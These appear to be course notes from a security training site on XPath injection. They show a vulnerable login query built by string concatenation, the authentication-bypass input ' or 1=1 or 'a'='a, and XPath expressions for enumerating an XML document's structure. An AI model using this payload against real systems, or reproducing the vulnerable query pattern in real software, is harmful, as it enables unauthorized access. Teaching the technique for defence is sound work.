Christophe Limpalair
Co-Founder of Cybr, and Course Author
XPATH is a language that queries XML documents to locate information, and find elements that match certain patterns or contain certain attributes.
XPATH doesn't provide access controls or user authentication.
If you find an injection vulnerability, you can re-create the structure of the XML document and its data.
XML can be used as a database, where we can store a wide variety of data.
XPATH can be used to access that data from your application code.
MySQL -----> XML
SQL -----> XPATH
<?xml version="1.0" encoding="utf-8"?>
<Users>
<User ID="1">
<FirstName>Christophe</FirstName>
<LastName>Limpalair</LastName>
<UserName>Christophe</UserName>
<Password>daebcd6d6e32f42790d36807763a8061</Password>
<Type>Admin</Type>
</User>
<User ID="2">
<FirstName>Eric</FirstName>
<LastName>G</LastName>
<UserName>Eric</UserName>
<Password>1a96179c675fe46550f052e1cf072f50</Password>
<Type>User</Type>
</Employee>
</Users>
FindUser = "//User[UserName/text()='" & Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
Username: ' or 1=1 or 'a'='a
Password: gfdjkngdfg
FindUser = "//User[UserName/text()='" & Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
Username: ' or 1=1 or 'a'='a
Password: gfdjkngdfg
FindUser = "//User[UserName/text()='" & Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
FindUser = "//User[UserName/text()='' or 1=1 or
'a'='a' And Password/text()='gfdjkngdfg']"
FindUser = "//User[UserName/text()='' or 1=1 or
'a'='a' And Password/text()='gfdjkngdfg']"
//User[(UserName/text()='' or 1=1) or
('a'='a' And Password/text()='gfdjkngdfg')]
The 2nd part of that statement doesn't even get evaluated since 1 always = 1
<?xml version="1.0" encoding="utf-8"?>
<Products>
<Product ID="163">
<ProductName>Cool Product</ProductName>
<ProductDescription>These are details for this cool product</ProductDescription>
<ProductPrice>$199</ProductPrice>
<QuantityAvailable>45</QuantityAvailable>
<ReleaseDate>2020</ReleaseDate>
</Product>
<Product ID="259">
<ProductName>Cool Product v2</ProductName>
<ProductDescription>These are details for this cool product v2</ProductDescription>
<ProductPrice>$299</ProductPrice>
<QuantityAvailable>10</QuantityAvailable>
<ReleaseDate>2023</ReleaseDate>
</Product>
</Products>
count(/Products/child::node()
//Product[position()=1]
Grab the first product in the XML document (indexes start at 1)
(//Product[position()=2]/child::node()[position()=3])
Grab the 2nd product, and the 3rd node of that 2nd product
(//Product[position()=2]/child::node()[position()=3])
By Christophe Limpalair